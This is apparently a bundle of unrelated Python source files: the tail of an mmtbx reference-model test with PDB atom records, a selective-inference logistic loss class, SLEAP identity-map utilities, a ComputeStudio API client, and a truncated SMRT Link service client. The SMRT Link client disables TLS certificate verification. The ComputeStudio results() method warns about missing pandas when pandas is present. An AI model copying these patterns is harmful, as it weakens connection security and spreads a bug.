ATOM 3358 OE1 GLN C 1 22.972 5.032 78.969 1.00 53.50 C O
ATOM 3359 NE2 GLN C 1 23.365 5.000 76.745 1.00 56.64 C N
ATOM 3360 C GLN C 1 27.097 8.250 77.886 1.00 56.46 C C
ATOM 3361 O GLN C 1 26.949 8.930 78.891 1.00 54.64 C O
ATOM 3362 N VAL C 2 27.019 8.808 76.660 1.00 57.14 C N
ATOM 3363 CA VAL C 2 26.719 10.217 76.428 1.00 55.41 C C
ATOM 3364 CB VAL C 2 27.931 10.987 75.916 1.00 55.45 C C
ATOM 3365 CG1 VAL C 2 27.552 12.336 75.269 1.00 53.41 C C
ATOM 3366 CG2 VAL C 2 28.864 11.254 77.110 1.00 54.84 C C
ATOM 3367 C VAL C 2 25.580 10.337 75.447 1.00 54.98 C C
ATOM 3368 O VAL C 2 25.617 9.750 74.367 1.00 56.38 C O
ATOM 3369 N GLN C 3 24.516 11.078 75.796 1.00 52.87 C N
ATOM 3370 CA GLN C 3 23.345 11.230 74.957 1.00 51.91 C C
ATOM 3371 CB GLN C 3 22.235 10.208 75.319 1.00 52.11 C C
ATOM 3372 CG GLN C 3 22.651 8.728 75.133 1.00 54.78 C C
ATOM 3373 CD GLN C 3 21.498 7.771 75.463 1.00 54.32 C C
ATOM 3374 OE1 GLN C 3 20.976 7.743 76.584 1.00 52.76 C O
ATOM 3375 NE2 GLN C 3 21.093 6.936 74.478 1.00 54.60 C N
ATOM 3376 C GLN C 3 22.755 12.621 75.095 1.00 49.15 C C
ATOM 3377 O GLN C 3 22.938 13.298 76.106 1.00 48.04 C O
ATOM 3378 N LEU C 4 22.017 13.068 74.065 1.00 47.90 C N
ATOM 3379 CA LEU C 4 21.268 14.320 74.040 1.00 45.28 C C
ATOM 3380 CB LEU C 4 21.893 15.309 73.052 1.00 44.69 C C
ATOM 3381 CG LEU C 4 23.323 15.776 73.331 1.00 45.36 C C
ATOM 3382 CD1 LEU C 4 23.813 16.685 72.216 1.00 44.60 C C
ATOM 3383 CD2 LEU C 4 23.407 16.483 74.670 1.00 44.38 C C
ATOM 3384 C LEU C 4 19.813 14.054 73.665 1.00 43.91 C C
ATOM 3385 O LEU C 4 19.518 13.665 72.535 1.00 44.12 C O
ATOM 3386 N GLN C 5 18.907 14.263 74.615 1.00 42.26 C N
ATOM 3387 CA GLN C 5 17.488 14.011 74.382 1.00 40.51 C C
ATOM 3388 CB GLN C 5 16.852 13.347 75.606 1.00 39.88 C C
ATOM 3389 CG GLN C 5 17.529 12.057 76.033 1.00 42.29 C C
ATOM 3390 CD GLN C 5 17.525 11.010 74.938 1.00 43.78 C C
ATOM 3391 OE1 GLN C 5 18.566 10.448 74.598 1.00 46.37 C O
ATOM 3392 NE2 GLN C 5 16.350 10.738 74.382 1.00 42.03 C N
ATOM 3393 C GLN C 5 16.760 15.304 74.047 1.00 38.05 C C
ATOM 3394 O GLN C 5 16.865 16.282 74.776 1.00 37.00 C O
ATOM 3395 N GLN C 6 16.020 15.312 72.945 1.00 37.12 C N
ATOM 3396 CA GLN C 6 15.338 16.529 72.520 1.00 34.96 C C
ATOM 3397 CB GLN C 6 15.647 16.828 71.051 1.00 35.40 C C
ATOM 3398 CG GLN C 6 17.121 17.076 70.774 1.00 37.30 C C
ATOM 3399 CD GLN C 6 17.370 17.631 69.387 1.00 37.26 C C
ATOM 3400 OE1 GLN C 6 18.353 17.285 68.732 1.00 38.80 C O
ATOM 3401 NE2 GLN C 6 16.478 18.503 68.932 1.00 35.44 C N
ATOM 3402 C GLN C 6 13.830 16.452 72.732 1.00 32.51 C C
ATOM 3403 O GLN C 6 13.230 15.380 72.646 1.00 32.39 C O
ATOM 3404 N SER C 7 13.227 17.604 73.013 1.00 30.41 C N
ATOM 3405 CA SER C 7 11.789 17.692 73.226 1.00 27.70 C C
ATOM 3406 CB SER C 7 11.431 19.008 73.916 1.00 25.77 C C
ATOM 3407 OG SER C 7 11.822 20.115 73.122 1.00 25.94 C O
ATOM 3408 C SER C 7 11.031 17.575 71.909 1.00 26.72 C C
ATOM 3409 O SER C 7 11.633 17.430 70.846 1.00 28.21 C O
ATOM 3410 N GLY C 8 9.707 17.636 71.984 1.00 24.02 C N
ATOM 3411 CA GLY C 8 8.882 17.597 70.792 1.00 22.64 C C
ATOM 3412 C GLY C 8 8.215 16.260 70.529 1.00 22.13 C C
ATOM 3413 O GLY C 8 8.319 15.342 71.342 1.00 22.76 C O
ATOM 3414 N PRO C 9 7.522 16.141 69.385 1.00 20.87 C N
ATOM 3415 CD PRO C 9 6.878 14.882 68.970 1.00 20.19 C C
ATOM 3416 CA PRO C 9 7.356 17.200 68.381 1.00 20.00 C C
ATOM 3417 CB PRO C 9 6.793 16.446 67.173 1.00 19.29 C C
ATOM 3418 CG PRO C 9 6.076 15.287 67.766 1.00 18.19 C C
ATOM 3419 C PRO C 9 6.401 18.308 68.821 1.00 17.07 C C
ATOM 3420 O PRO C 9 5.485 18.062 69.605 1.00 14.88 C O
ATOM 3421 N GLU C 10 6.626 19.516 68.314 1.00 16.93 C N
ATOM 3422 CA GLU C 10 5.849 20.679 68.723 1.00 14.34 C C
ATOM 3423 CB GLU C 10 6.778 21.768 69.269 1.00 15.71 C C
ATOM 3424 CG GLU C 10 7.498 21.386 70.554 1.00 17.24 C C
ATOM 3425 CD GLU C 10 6.559 21.288 71.742 1.00 14.84 C C
ATOM 3426 OE1 GLU C 10 5.821 22.262 71.999 1.00 12.41 C O
ATOM 3427 OE2 GLU C 10 6.556 20.236 72.416 1.00 15.30 C O
ATOM 3428 C GLU C 10 5.000 21.240 67.583 1.00 12.13 C C
ATOM 3429 O GLU C 10 5.457 21.355 66.443 1.00 13.28 C O
TER
END
"""
model = mmtbx.model.manager(
model_input = iotbx.pdb.input(lines=flex.split_lines(pdb_str_original),
source_info=None),
process_input=True)
pdb_h = model.get_hierarchy()
ref_h = pdb_h.deep_copy()
# pdb_h.atoms().reset_i_seq()
# ref_h.atoms().reset_i_seq()
log = cStringIO.StringIO()
# log = sys.stdout
def_pars = reference_model_params
all_pars = def_pars.fetch().extract()
all_pars.reference_model.use_starting_model_as_reference=True
all_pars.reference_model.enabled = True
rm = reference_model(
model=model,
reference_hierarchy_list=\
[model.get_hierarchy()],
params=all_pars.reference_model,
log=log)
rm.show_reference_summary(log=log)
assert rm.get_n_proxies() == 141, \
"Expecting 141 proxies, got %d" % rm.get_n_proxies()
log_strings = log.getvalue().split("\n")
# print "========"
# print "\n".join(log_strings)
# print "========"
for needed_string in [
"GLY A 8 <=====> GLY A 8",
"PRO A 9 <=====> PRO A 9",
"GLY A 10 <=====> GLY A 10",
"ASP B 1 <=====> ASP B 1",
"ILE B 2 <=====> ILE B 2",
"SER B 10 <=====> SER B 10",
"GLN C 1 <=====> GLN C 1",
"VAL C 2 <=====> VAL C 2",
]:
assert needed_string in log_strings, "'%s' not in log!" % needed_string
def run(args):
t0 = time.time()
import mmtbx.monomer_library
mon_lib_srv = mmtbx.monomer_library.server.server()
ener_lib = mmtbx.monomer_library.server.ener_lib()
exercise_reference_model(args, mon_lib_srv, ener_lib)
exercise_multiple_to_one(args, mon_lib_srv, ener_lib)
exercise_multiple_ncs_groups_found(mon_lib_srv, ener_lib)
exercise_cutted_residue(mon_lib_srv, ener_lib)
exercise_dna(mon_lib_srv, ener_lib)
exercise_3chains_self(mon_lib_srv, ener_lib)
print "OK. Time: %8.3f"%(time.time()-t0)
if (__name__ == "__main__"):
run(args=sys.argv[1:])
|
import numpy as np
from base import selective_loss
import regreg.api as rr
class logistic_Xrandom(selective_loss):
def __init__(self, X, y,
coef=1.,
offset=None,
quadratic=None,
initial=None):
selective_loss.__init__(self, X.shape[1],
coef=coef,
offset=offset,
quadratic=quadratic,
initial=initial)
self.X = X.copy()
self.y = y.copy()
self._restricted_grad_beta = np.zeros(self.shape)
def smooth_objective(self, beta, mode='both',
check_feasibility=False):
_loss = rr.logistic_loss(self.X, self.y, coef=self.X.shape[0]/2.)
return _loss.smooth_objective(beta, mode=mode, check_feasibility=check_feasibility)
# this is something that regreg does not know about, i.e.
# what is data and what is not...
def fit_E(self, active, solve_args={'min_its':50, 'tol':1.e-10}):
"""
Fits the logistic regression after seeing the active set, without penalty.
Calls the method bootstrap_covariance() to bootstrap the covariance matrix.
Parameters:
----------
active: the active set from fitting the logistic lasso
solve_args: passed to regreg.simple_problem.solve
Returns:
--------
Set self._beta_unpenalized which will be used in the covariance matrix calculation.
"""
self.active = active
if self.active.any():
self.inactive = ~active
X_E = self.X[:, self.active]
loss_E = rr.logistic_loss(X_E, self.y)
self._beta_unpenalized = loss_E.solve(**solve_args)
self.bootstrap_covariance()
else:
raise ValueError("Empty active set.")
def bootstrap_covariance(self):
"""
Bootstrap the covariance matrix of the sufficient statistic $X^T y$,
through the use of the restricted unpenalized solution to the
problem $\bar{beta}_E$.
Set the "_cov" field to be the bootstrapped covariance matrix.
"""
if not hasattr(self, "_beta_unpenalized"):
raise ValueError("method fit_E has to be called before computing the covariance")
if not hasattr(self, "_cov"):
# nonparametric bootstrap for covariance of X^Ty
X, y = self.X, self.y
n, p = X.shape
nsample = 2000
def pi(X):
w = np.exp(np.dot(X[:,self.active], self._beta_unpenalized))
return w / (1 + w)
_mean_cum = 0
self._cov = np.zeros((p, p))
for _ in range(nsample):
indices = np.random.choice(n, size=(n,), replace=True)
y_star = y[indices]
X_star = X[indices]
Z_star = np.dot(X_star.T, y_star - pi(X_star))
_mean_cum += Z_star
self._cov += np.multiply.outer(Z_star, Z_star)
self._cov /= nsample
_mean = _mean_cum / nsample
self._cov -= np.multiply.outer(_mean, _mean)
self.L = np.linalg.cholesky(self._cov)
@property
def covariance(self, doc="Covariance of sufficient statistic $X^Ty$."):
if not hasattr(self, "_cov"):
self.bootstrap_covariance()
return self._cov
def gradient(self, data, beta):
"""
Gradient of smooth part restricted to active set
"""
if not hasattr(self, "_cov"):
self.bootstrap_covariance()
g = -(data - np.dot(self._cov, beta))
return g
def hessian(self, data, beta):
"""
hessian is constant in this case.
"""
if not hasattr(self, "_cov"):
self.bootstrap_covariance()
return self._cov
def setup_sampling(self, data, mean, linear_part, value):
"""
Set up the sampling conditioning on the KKT constraints as well as
the linear constraints C * data = d
Parameters:
----------
data:
The subject of the sampling. In this case the gradient of loss at 0.
mean: \beta^0_E
sigma: default to None in logistic lasso
linear_part: C
value: d
"""
self.accept_data = 0
self.total_data = 0
P = np.dot(linear_part.T, np.linalg.pinv(linear_part).T)
I = np.identity(linear_part.shape[1])
self.data = data
self.mean = mean
self.R = I - P
self.P = P
self.linear_part = linear_part
def proposal(self, data):
if not hasattr(self, "L"):
self.bootstrap_covariance()
n, p = self.X.shape
stepsize = 1. / np.sqrt(p)
#new = data + stepsize * np.dot(self.R,
# np.dot(self.L, np.random.standard_normal(p)))
new = data + stepsize * np.dot(self.R,
np.random.standard_normal(p))
log_transition_p = self.logpdf(new) - self.logpdf(data)
return new, log_transition_p
def logpdf(self, data):
return -((data-self.mean)*np.dot(np.linalg.pinv(self._cov), data-self.mean)).sum() / 2
def update_proposal(self, state, proposal, logpdf):
pass
|
"""Utilities for generating data for track identity models."""
import sleap
import tensorflow as tf
import attr
from typing import List, Text
def make_class_vectors(class_inds: tf.Tensor, n_classes: int) -> tf.Tensor:
"""Make a binary class vectors from class indices.
Args:
class_inds: Class indices as `tf.Tensor` of dtype `tf.int32` and shape
`(n_instances,)`. Indices of `-1` will be interpreted as having no class.
n_classes: Integer number of maximum classes.
Returns:
A tensor with binary class vectors of shape `(n_instances, n_classes)` of dtype
`tf.int32`. Instances with no class will have all zeros in their row.
Notes: A class index can be used to represent a track index.
"""
return tf.one_hot(class_inds, n_classes, dtype=tf.int32)
def make_class_maps(
confmaps: tf.Tensor, class_inds: tf.Tensor, n_classes: int, threshold: float = 0.2
) -> tf.Tensor:
"""Generate identity class maps using instance-wise confidence maps.
This is useful for making class maps defined on local neighborhoods around the
peaks.
Args:
confmaps: Confidence maps for the same points as the offset maps as a
`tf.Tensor` of shape `(grid_height, grid_width, n_instances)` and dtype
`tf.float32`. This can be generated by
`sleap.nn.data.confidence_maps.make_confmaps`.
class_inds: Class indices as `tf.int32` tensor of shape `(n_instances)`.
n_classes: Integer number of maximum classes.
threshold: Minimum confidence map value below which map values will be replaced
with zeros.
Returns:
The class maps with shape `(grid_height, grid_width, n_classes)` and dtype
`tf.float32` where each channel will be a binary mask with 1 where the instance
confidence maps were higher than the threshold.
Notes:
Pixels that have confidence map values from more than one animal will have the
class vectors weighed by the relative contribution of each instance.
See also: make_class_vectors, sleap.nn.data.confidence_maps.make_confmaps
"""
n_classes = tf.squeeze(n_classes)
n_instances = tf.shape(confmaps)[2]
class_vectors = make_class_vectors(class_inds, n_classes)
class_vectors = tf.reshape(
tf.cast(class_vectors, tf.float32),
[1, 1, n_instances, n_classes],
)
# Normalize instance mask.
mask = confmaps / tf.reduce_sum(confmaps, axis=2, keepdims=True)
mask = tf.where(confmaps > threshold, mask, 0.0) # (h, w, n_instances)
mask = tf.expand_dims(mask, axis=3) # (h, w, n_instances, 1)
# Apply mask to vectors to create class maps.
class_maps = tf.reduce_max(mask * class_vectors, axis=2)
return class_maps
@attr.s(auto_attribs=True)
class ClassVectorGenerator:
"""Transformer to generate class probability vectors from track indices."""
@property
def input_keys(self) -> List[Text]:
"""Return the keys that incoming elements are expected to have."""
return ["track_inds", "n_tracks"]
@property
def output_keys(self) -> List[Text]:
"""Return the keys that outgoing elements will have."""
return self.input_keys + ["class_vectors"]
def transform_dataset(self, input_ds: tf.data.Dataset) -> tf.data.Dataset:
"""Create a dataset that contains the generated class identity vectors.
Args:
input_ds: A dataset with elements that contain the keys`"track_inds"` and
`"n_tracks"`.
Returns:
A `tf.data.Dataset` with the same keys as the input, as well as a `"class"`
key containing the generated class vectors.
"""
def generate_class_vectors(example):
"""Local processing function for dataset mapping."""
example["class_vectors"] = tf.cast(
make_class_vectors(example["track_inds"], example["n_tracks"]),
tf.float32,
)
return example
# Map transformation.
output_ds = input_ds.map(
generate_class_vectors, num_parallel_calls=tf.data.experimental.AUTOTUNE
)
return output_ds
@attr.s(auto_attribs=True)
class ClassMapGenerator:
"""Transformer to generate class maps from track indices.
Attributes:
sigma: Standard deviation of the 2D Gaussian distribution sampled to generate
confidence maps for masking the identity maps. This defines the spread in
units of the input image's grid, i.e., it does not take scaling in previous
steps into account.
output_stride: Relative stride of the generated maps. This is effectively the
reciprocal of the output scale, i.e., increase this to generate maps that
are smaller than the input images.
centroids: If `True`, generate masking confidence maps for centroids rather than
instance points.
class_map_threshold: Minimum confidence map value below which map values will be
replaced with zeros.
"""
sigma: float = 2.0
output_stride: int = 1
centroids: bool = False
class_map_threshold: float = 0.2
@property
def input_keys(self) -> List[Text]:
"""Return the keys that incoming elements are expected to have."""
if self.centroids:
return ["centroids", "track_inds", "n_tracks"]
else:
return ["instances", "track_inds", "n_tracks"]
@property
def output_keys(self) -> List[Text]:
"""Return the keys that outgoing elements will have."""
return self.input_keys + ["class_maps"]
def transform_dataset(self, input_ds: tf.data.Dataset) -> tf.data.Dataset:
"""Create a dataset that contains the generated class identity maps.
Args:
input_ds: A dataset with elements that contain the keys `"image"`,
`"track_inds"`, `"n_tracks"` and either `"instances"` or `"centroids"`
depending on whether the `centroids` attribute is set to `True`.
Returns:
A `tf.data.Dataset` with the same keys as the input, as well as a
`"class_maps"` key containing the generated class maps.
"""
# Infer image dimensions to generate the full scale sampling grid.
test_example = next(iter(input_ds))
image_height = test_example["image"].shape[0]
image_width = test_example["image"].shape[1]
# Generate sampling grid vectors.
xv, yv = sleap.nn.data.confidence_maps.make_grid_vectors(
image_height=image_height,
image_width=image_width,
output_stride=self.output_stride,
)
def generate_class_maps(example):
"""Local processing function for dataset mapping."""
if self.centroids:
points = tf.expand_dims(
example["centroids"], axis=0
) # (1, n_instances, 2)
else:
points = tf.transpose(
example["instances"], [1, 0, 2]
) # (n_nodes, n_instances, 2)
# Generate confidene maps for masking.
cms = sleap.nn.data.confidence_maps.make_multi_confmaps(
points, xv, yv, self.sigma * self.output_stride
) # (height, width, n_instances)
example["class_maps"] = make_class_maps(
cms,
class_inds=example["track_inds"],
n_classes=example["n_tracks"],
threshold=self.class_map_threshold,
)
return example
# Map transformation.
output_ds = input_ds.map(
generate_class_maps, num_parallel_calls=tf.data.experimental.AUTOTUNE
)
return output_ds
|
from io import StringIO
from pathlib import Path
import time
from typing import Optional
import os
import warnings
import requests
try:
import pandas as pd
except ImportError as ie:
pd = None
from cs_kit.exceptions import APIException
class ComputeStudio:
"""
Python client for the ComputeStudio webapp.
- Run simulations
- Update simulation metadata
- Download your results
.. code-block:: python
client = ComputeStudio("PSLmodels", "TaxBrain")
client.create()
Learn how to get your API token from the
`Authentication docs <https://docs.compute.studio/api/auth.html>`_. Once you have your token,
you can save it in a file named ``.cs_api_token`` in the home directory of your
computer. You can also set it as an environment variable or pass it directly
to the ``ComputeStudio`` class.
"""
host = "https://compute.studio"
def __init__(self, owner: str, title: str, api_token: Optional[str] = None):
self.owner = owner
self.title = title
api_token = self.get_token(api_token)
self.auth_header = {"Authorization": f"Token {api_token}"}
self.sim_url = f"{self.host}/{owner}/{title}/api/v1/"
self.inputs_url = f"{self.host}/{owner}/{title}/api/v1/inputs/"
def create(self, adjustment: dict = None, meta_parameters: dict = None):
"""
Create a simulation on Compute Studio.
Parameters
----------
adjustment : dict
Parameter values in the `ParamTools format <https://paramtools.dev/api/reference.html>`_.
meta_parameters: dict
Meta parameters for the simulation in a ``key:value`` format.
Returns
--------
response: dict
Response from the Compute Studio server. Use this to get the simulation ID and status.
"""
adjustment = adjustment or {}
meta_parameters = meta_parameters or {}
resp = requests.post(
self.sim_url,
json={"adjustment": adjustment, "meta_parameters": meta_parameters},
headers=self.auth_header,
)
if resp.status_code == 201:
data = resp.json()
pollresp = requests.get(
f"{self.sim_url}{data['sim']['model_pk']}/edit/",
headers=self.auth_header,
)
polldata = pollresp.json()
while pollresp.status_code == 200 and polldata["status"] == "PENDING":
time.sleep(3)
pollresp = requests.get(
f"{self.sim_url}{data['sim']['model_pk']}/edit/",
headers=self.auth_header,
)
polldata = pollresp.json()
if pollresp.status_code == 200 and polldata["status"] == "SUCCESS":
simresp = requests.get(
f"{self.sim_url}{data['sim']['model_pk']}/remote/",
headers=self.auth_header,
)
return simresp.json()
else:
raise APIException(pollresp.json())
raise APIException(resp.json())
def detail(
self,
model_pk: int,
include_outputs: bool = False,
wait: bool = True,
polling_interval: int = 5,
timeout: int = 600,
):
"""
Get detail for a simulation.
Parameters
----------
model_pk : int
ID for the simulation.
include_outputs: bool
Include outputs from the simulation in addition to the simulation metadata.
wait: bool
Meta parameters for the simulation in a key:value format.
polling_interval: int
Polling interval dictates how often the status of the results will be checked.
timeout: int
Time in seconds to wait for the simulation to finish.
Returns
--------
response: dict
Response from the Compute Studio server.
"""
if include_outputs:
url = f"{self.sim_url}{model_pk}/"
else:
url = f"{self.sim_url}{model_pk}/remote/"
start = time.time()
while True:
if (time.time() - start) > timeout:
raise TimeoutError(f"Simulation not ready in under {timeout} seconds.")
resp = requests.get(url, headers=self.auth_header)
if resp.status_code == 202 and wait:
continue # waiting on the simulation to finish.
elif resp.status_code == 202 and not wait:
return resp.json()
elif resp.status_code == 200:
return resp.json()
else:
raise APIException(resp.json())
time.sleep(polling_interval)
def inputs(self, model_pk: Optional[int] = None):
"""
Get the inputs for a simulation or retrieve the inputs documentation for the app.
Parameters
-----------
model_pk: int
ID for the simulation.
Returns
-------
response: dict
Response from the Compute Studio server.
"""
if model_pk is None:
resp = requests.get(f"{self.sim_url}inputs/", headers=self.auth_header)
resp.raise_for_status()
return resp.json()
else:
resp = requests.get(
f"{self.sim_url}{model_pk}/edit/", headers=self.auth_header
)
resp.raise_for_status()
return resp.json()
def results(self, model_pk: int, timeout: int = 600):
"""
Retrieve and parse results into the appropriate data structure. Currently,
CSV outputs are loaded into a pandas `DataFrame`. Other outputs are returned
as is.
Parameters
----------
model_pk: int
ID for the simulation.
timeout: int
Time in seconds to wait for the simulation to finish.
Returns
-------
result: dict
Dictionary of simulation outputs formated as title:output.
"""
result = self.detail(model_pk, include_outputs=True, wait=True, timeout=timeout)
res = {}
for output in result["outputs"]["downloadable"]:
if output["media_type"] == "CSV" and pd is not None:
warnings.warn(
"Install pandas to return CSV output as a pandas DataFrame."
)
res[output["title"]] = pd.read_csv(StringIO(output["data"]))
else:
res[output["title"]] = output["data"]
return res
def update(
self,
model_pk: int,
title: Optional[str] = None,
is_public: Optional[bool] = None,
notify_on_completion: Optional[bool] = None,
):
"""
Update meta data about a simulation.
.. code-block:: python
cs.update(
model_pk=123,
title="hello world",
is_public=True,
notify_on_completion=True
)
Parameters
----------
model_pk: int
ID for the simulation.
title: str
Title of the simulation.
is_public: bool
Set whether simulation is public or private.
Notify_on_completion: bool
Send an email notification when the simulation completes.
Returns
-------
response: dict
Response from the Compute Studio server.
"""
vals = [
("title", title),
("is_public", is_public),
("notify_on_completion", notify_on_completion),
]
sim_kwargs = {}
for name, val in vals:
if val is not None:
sim_kwargs[name] = val
resp = requests.put(
f"{self.sim_url}{model_pk}/",
json=sim_kwargs,
headers=self.auth_header,
)
if resp.status_code == 200:
return resp.json()
else:
raise APIException(resp.json())
def get_token(self, api_token):
"""Retrieve the API token"""
token_file_path = Path.home() / ".cs-api-token"
if api_token:
return api_token
elif os.environ.get("CS_API_TOKEN", None) is not None:
return os.environ["CS_API_TOKEN"]
elif token_file_path.exists():
with open(token_file_path, "r") as f:
return f.read().strip()
else:
raise APIException(
f"API token not found. It can be passed as an argument to "
f"this class, as an environment variable at CS_API_TOKEN, "
f"or read from {token_file_path}"
)
|
"""Utils for Updating state/progress and results to WebServices
"""
from builtins import object
import base64
import json
import logging
import pprint
import time
import datetime
import warnings
import os
import pytz
import requests
from requests import RequestException
# To disable the ssl cert check warning
from requests.packages.urllib3.exceptions import InsecureRequestWarning # pylint: disable=import-error
requests.packages.urllib3.disable_warnings(InsecureRequestWarning) # pylint: disable=no-member
from pbcommand.models import (FileTypes,
DataSetFileType,
DataStore,
DataStoreFile)
from pbcommand.utils import get_dataset_metadata
from .models import (SMRTServiceBaseError,
JobResult, JobStates, JobExeError, JobTypes,
ServiceResourceTypes, ServiceJob, JobEntryPoint,
JobTask)
from pbcommand.pb_io import load_report_from
from .utils import to_sal_summary
log = logging.getLogger(__name__)
logging.getLogger("requests").setLevel(logging.WARNING)
logging.getLogger("urllib3").setLevel(logging.WARNING)
# log.addHandler(logging.NullHandler()) # to prevent the annoying 'No handlers .. ' msg
# Everything else is considered a non-public
__all__ = ['ServiceAccessLayer', 'SmrtLinkAuthClient']
class Constants(object):
HEADERS = {'Content-type': 'application/json'}
def __jsonable_request(request_method, headers):
def wrapper(url, d_):
data = json.dumps(d_)
# FIXME 'verify' should be passed in
return request_method(url, data=data, headers=headers, verify=False)
return wrapper
def _post_requests(headers):
return __jsonable_request(requests.post, headers)
def _put_requests(headers):
return __jsonable_request(requests.put, headers)
def _get_requests(headers):
def wrapper(url):
return requests.get(url, headers=headers, verify=False)
return wrapper
def _parse_base_service_error(response):
""":type response: requests.Response
Don't trust the services. Try to parse the response to SMRT Server Error
datastructure (even if a 200 is returned)
"""
if response.ok:
try:
d = response.json()
emsg = SMRTServiceBaseError.from_d(d)
raise emsg
except (KeyError, TypeError):
# couldn't parse response -> error,
# so everything is fine
return response
else:
return response
def __get_headers(h):
if h is None:
return Constants.HEADERS
return h
def _process_rget(total_url, ignore_errors=False, headers=None):
"""Process get request and return JSON response. Raise if not successful"""
r = _get_requests(__get_headers(headers))(total_url)
_parse_base_service_error(r)
if not r.ok and not ignore_errors:
log.error("Failed ({s}) GET to {x}".format(x=total_url, s=r.status_code))
r.raise_for_status()
j = r.json()
return j
def _process_rget_with_transform(func, ignore_errors=False):
"""Post process the JSON result (if successful) with F(json_d) -> T"""
def wrapper(total_url, headers=None):
j = _process_rget(total_url, ignore_errors=ignore_errors, headers=headers)
return func(j)
return wrapper
def _process_rget_with_jobs_transform(total_url, ignore_errors=False, headers=None):
# defining an internal method, because this used in several places
jobs_d = _process_rget(total_url, ignore_errors=ignore_errors, headers=headers)
# Sort by Id desc so newer jobs show up first
jobs = [ServiceJob.from_d(job_d) for job_d in jobs_d]
return sorted(jobs, key=lambda x: x.id, reverse=True)
def _process_rget_or_none(func, ignore_errors=False):
"""
apply the transform func to the output of GET request if it was successful, else returns None
This is intended to be used for looking up Results by Id where the a 404
is found.
"""
def wrapper(total_url, headers):
try:
return _process_rget_with_transform(func, ignore_errors)(total_url, headers)
except (RequestException, SMRTServiceBaseError):
# FIXME
# this should be a tighter exception case
# only look for 404
return None
return wrapper
def _process_rget_with_job_transform_or_none(total_url, headers=None):
return _process_rget_or_none(ServiceJob.from_d)(total_url, headers=headers)
def __process_creatable_to_json(f):
def wrapper(total_url, payload_d, headers):
r = f(__get_headers(headers))(total_url, payload_d)
_parse_base_service_error(r)
# FIXME This should be strict to only return a 201
if r.status_code not in (200, 201, 202, 204):
log.error("Failed ({s} to call {u}".format(u=total_url, s=r.status_code))
log.error("payload")
log.error("\n" + pprint.pformat(payload_d))
r.raise_for_status()
j = r.json()
return j
return wrapper
_process_rpost = __process_creatable_to_json(_post_requests)
_process_rput = __process_creatable_to_json(_put_requests)
def _process_rpost_with_transform(func):
def wrapper(total_url, payload_d, headers=None):
j = _process_rpost(total_url, payload_d, headers)
return func(j)
return wrapper
def _process_rput_with_transform(func):
def wrapper(total_url, payload_d, headers=None):
j = _process_rput(total_url, payload_d, headers)
return func(j)
return wrapper
def _to_url(base, ext):
return "".join([base, ext])
def _null_func(x):
# Pass thorough func
return x
def _transform_job_tasks(j):
return [JobTask.from_d(d) for d in j]
def _import_dataset_by_type(dataset_type_or_id):
if isinstance(dataset_type_or_id, DataSetFileType):
ds_type_id = dataset_type_or_id.file_type_id
else:
ds_type_id = dataset_type_or_id
def wrapper(total_url, path, headers, avoid_duplicate_import=False):
_d = dict(datasetType=ds_type_id,
path=path,
avoidDuplicateImport=avoid_duplicate_import)
return _process_rpost_with_transform(ServiceJob.from_d)(total_url, _d, headers)
return wrapper
def _get_job_by_id_or_raise(sal, job_id, error_klass, error_messge_extras=None):
job = sal.get_job_by_id(job_id)
if job is None:
details = "" if error_messge_extras is None else error_messge_extras
base_msg = "Failed to find job {i}".format(i=job_id)
emsg = " ".join([base_msg, details])
raise error_klass(emsg)
return job
def _block_for_job_to_complete(sal, job_id, time_out=1200, sleep_time=2,
abort_on_interrupt=True):
"""
Waits for job to complete
:param sal: ServiceAccessLayer
:param job_id: Job Id
:param time_out: Total runtime before aborting
:param sleep_time: polling interval (in sec)
:rtype: JobResult
:raises: KeyError if job is not initially found, or JobExeError
if the job fails during the polling process or times out
"""
try:
external_job_id = None
time.sleep(sleep_time)
job = _get_job_by_id_or_raise(sal, job_id, KeyError)
log.info("SMRT Link job {i} ({u})".format(i=job.id, u=job.uuid))
log.debug("time_out = {t}".format(t=time_out))
error_msg = ""
job_result = JobResult(job, 0, error_msg)
started_at = time.time()
# number of polling steps
i = 0
while True:
run_time = time.time() - started_at
if external_job_id is None and job.external_job_id is not None:
external_job_id = job.external_job_id
log.info("Cromwell workflow ID is %s", external_job_id)
if job.state in JobStates.ALL_COMPLETED:
break
i += 1
time.sleep(sleep_time)
msg = "Running pipeline {n} (job {j}) state: {s} runtime:{r:.2f} sec {i} iteration".format(n=job.name, j=job.id, s=job.state, r=run_time, i=i)
log.debug(msg)
# making the exceptions different to distinguish between an initial
# error and a "polling" error. Adding some msg details
job = _get_job_by_id_or_raise(sal, job_id, JobExeError, error_messge_extras=msg)
# FIXME, there's currently not a good way to get errors for jobs
job_result = JobResult(job, run_time, "")
if time_out is not None:
if run_time > time_out:
raise JobExeError("Exceeded runtime {r} of {t}. {m}".format(r=run_time, t=time_out, m=msg))
return job_result
except KeyboardInterrupt:
if abort_on_interrupt:
sal.terminate_job_id(job_id)
raise
# Make this consistent somehow. Maybe defined 'shortname' in the core model?
# Martin is doing this for the XML file names
DATASET_METATYPES_TO_ENDPOINTS = {
FileTypes.DS_SUBREADS_H5: "hdfsubreads",
FileTypes.DS_SUBREADS: "subreads",
FileTypes.DS_ALIGN: "alignments",
FileTypes.DS_REF: "references",
FileTypes.DS_BARCODE: "barcodes",
FileTypes.DS_CCS: "ccsreads",
FileTypes.DS_CONTIG: "contigs",
FileTypes.DS_ALIGN_CCS: "cssalignments",
FileTypes.DS_GMAP_REF: "gmapreferences"}
def _get_endpoint_or_raise(ds_type):
if ds_type in DATASET_METATYPES_TO_ENDPOINTS:
return DATASET_METATYPES_TO_ENDPOINTS[ds_type]
raise KeyError("Unsupported datasettype {t}. Supported values {v}".format(t=ds_type, v=list(DATASET_METATYPES_TO_ENDPOINTS.keys())))
def _job_id_or_error(job_or_error, custom_err_msg=None):
"""
Extract job id from job creation service (by type)
or Raise exception from an EngineJob response
:raises: JobExeError
"""
if isinstance(job_or_error, ServiceJob):
return job_or_error.id
else:
emsg = job_or_error.get('message', "Unknown")
if custom_err_msg is not None:
emsg += " {f}".format(f=custom_err_msg)
raise JobExeError("Failed to create job. {e}. Raw Response {x}".format(e=emsg, x=job_or_error))
def _to_ds_file(d):
# is_chunk this isn't exposed at the service level
return DataStoreFile(d['uuid'], d['sourceId'], d['fileTypeId'], d['path'], is_chunked=False, name=d.get("name", ""), description=d.get("description", ""))
def _to_datastore(dx):
# Friction to get around service endpoint not returning a list of files
ds_files = [_to_ds_file(d) for d in dx]
return DataStore(ds_files)
def _to_job_report_files(dx):
return [{u"reportTypeId": d["reportTypeId"],
u"dataStoreFile": _to_ds_file(d["dataStoreFile"])} for d in dx]
def _to_entry_points(d):
